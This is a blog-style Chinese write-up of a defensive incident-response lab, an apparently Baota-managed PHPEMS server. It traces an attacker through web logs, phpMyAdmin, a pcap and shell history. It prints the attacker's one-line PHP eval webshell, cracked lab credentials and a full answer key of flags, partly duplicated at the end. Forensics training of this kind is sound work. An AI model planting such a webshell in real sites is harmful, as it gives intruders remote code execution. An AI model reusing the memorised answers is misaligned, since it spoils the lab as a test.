Hvv--知攻善防应急响应靶机--Linux2

HW–应急响应靶机–Linux2

所有靶机均来自 知攻善防实验室

靶机整理：

• 夸克网盘：https://pan.quark.cn/s/4b6dffd0c51a#/list/share
• 本站蜘蛛：https://pan.baidu.com/s/1NnrS5asrS1Pw6LUbexewuA?pwd=txmy

官方WP：https://mp.weixin.qq.com/s/opj5dJK7htdawkmLbsSJiQ

蓝队应急响应工具箱：

• 夸克网盘：https://pan.quark.cn/s/6d7856efd1d1#/list/share

• 本站蜘蛛：https://pan.baidu.com/s/1ZyrDPH6Ji88w9IJMoFpANA?pwd=ilzn

前景需要：

看监控的时候发现webshell告警，领导让你上机检查你可以救救安服仔吗！！

1,提交攻击者IP
2,提交攻击者修改的管理员密码(明文)
3,提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)
3,提交Webshell连接密码
4,提交数据包的flag1
5,提交攻击者使用的后续上传的木马文件名称
6,提交攻击者隐藏的flag2
7,提交攻击者隐藏的flag3

解题关键点

网站日志

PHPMyadmin | md5加密

注册页面被挂🐎

WireShark

冰蝎Webshell流量特征

history命令

环境变量

虚拟机登录

密码中的I为大写的ℹ️

查看虚拟机IP，我这里是10.10.10.53，NAT模式自动分配的

由于靶机是最小化模式的，不好操作，也不好复制粘贴，我们利用MobaXterm工具ssh连接靶机进行操作，也可以利用其他ssh连接工具，如Xshell等等

输入密码后发现成功登录靶机

发现当前路径下有一个数据包，还有题解系统

尝试运行题解系统，看需要获取哪些信息

攻击者IP

这个靶机是利用宝塔来管理的，修改宝塔面板密码为root

查看宝塔面板默认信息

登录宝塔面板

输入用户名密码

用户名：uysycv5w

密码：root

成功登录宝塔面板

在网站日志中可看到全部是 192.168.20.1 的IP地址

在 网站 选项卡中点击 127.0.0.1进 行站点修改，也可看到IP

攻击者修改的管理员密码(明文)

数据库账号密码在那一行，密码点那个眼睛👀就可以显示，可以通过面板或者公共方式访问 phpMyAdmin ，都差不多

这里我们选择面板访问，输入账号密码

用户名：kaoshi

密码：5Sx8mK5ieyLPb84m

成功登录 phpMyAdmin ,发现 kaoshi 数据库

在第二页的 x2_user 表中发现账号密码，密码被加密了，需要查看源码看是什么加密算法来进行逆推

不过这里一眼就可以看出是md5加密，看源码只是为了防止密码被加盐

在 文件 选项卡下，发现了 register.app.php 是注册页面，双击文件即可打开在线编辑器查看文件，发现第65行，存储密码时调用了 modifyUserPassword 函数来加密

#register.app.php文件绝对路径
/www/wwwroot/127.0.0.1/app/user/controller/register.app.php

之后在 user.cls.php 页面中发现 modifyUserPassword 函数代码块，发现利用的是md5加密算法

#user.cls.php文件绝对路径
/www/wwwroot/127.0.0.1/app/user/cls/user.cls.php

直接将peadmin用户的密码密文放到在线解密网站去解密

在线md5解密网站：https://www.somd5.com/

密文：f6f6eb5ace977d7e114377cc7098b7e3

得出明文密码为 Network@2020

第一次Webshell的连接URL

在 网站 选项卡下，双击 127.0.0.1 或者点击最右边的设置，在 域名管理 中添加一个域名，我添加的是靶机机器IP 10.10.10.53 ，之后就可以访问靶机Web页面

访问靶机Web页面，发现是PHPEMS模拟考试系统

拿刚刚获取的账号密码登录网站

账号：peadmin

密码：Network@2020

然后点击 个人中心 页面的 后台管理

成功进入网站后台管理页面

在 内容页面的 标签管理选择卡中发现木马文件

发现木马写在了 注册协议 的 注册页面 ，注册协议的路由为 user-app-register

那提交第一次Webshell的连接URL则为

http://10.10.10.53/index.php?user-app-register

Webshell连接密码

在内容选项卡页面的标签管理中发现木马文件

#木马文件源码
<?php 
namespace t;
@eval($_POST['Network2020']);
?>

则Webshell的连接密码为 Network2020

数据包的flag1

下载 /root 目录下的 数据包1.pcapng 如果用的是 MobaXterm 软件可以直接拖拽至桌面即可完成下载，其他ssh连接软件自行网上查找下载办法，或者利用其他办法，如SCP、FTP、临时HTTP服务下载等等，这里不多赘述，请自行百度

将数据包用 WireShark 打开，之后输入 tcp.stream eq 20 过滤出一段数据流，选择 /flag1 那一行右键，在弹出的菜单栏中选择 追踪流 — TCP流 ，即可弹出页面，在页面中发现 flag1

flag1{Network@_2020_Hack}

攻击者使用的后续上传的木马文件名称

输入 tcp.stream eq 30 过滤出一段数据流，选择 /version2.php 那一行右键，在弹出的菜单栏中选择 追踪流 — TCP流 ，即可弹出页面，在页面中发现经典的 冰蝎Webshell特征

冰蝎Webshell流量特征参考文章：冰蝎4.0特征分析及流量检测思路 - FreeBuf网络安全行业门户

#木马名称
version2.php

攻击者隐藏的flag2

查看 history 命令出来的命令历史记录，发现攻击者疑似依次修改过mpnotify.php 与 alinotify.php 两个文件

依据历史命令得知这两个文件是在.api/目录下的，查看两个文件存放位置

mpnotify.php 文件没有发现异常

在 alinotify.php 文件中发现flag2

flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}

攻击者隐藏的flag3

history命令查看命令记录发现攻击者创建了一个用户flag3，定义了一个全局变量$flag3，疑似修改了环境变量文件/etc/profile，env命令（显示系统的环境变量）也有嫌疑

查看文件、变量、env命令都可查看到flag3

flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

成功通关

#wp通关Payload

192.168.20.1
Network@2020
index.php?user-app-register
Network2020
flag1{Network@_2020_Hack}
version2.php
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

成功通关

#wp通关Payload

192.168.20.1
Network@2020
index.php?user-app-register
Network2020
flag1{Network@_2020_Hack}
version2.php
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}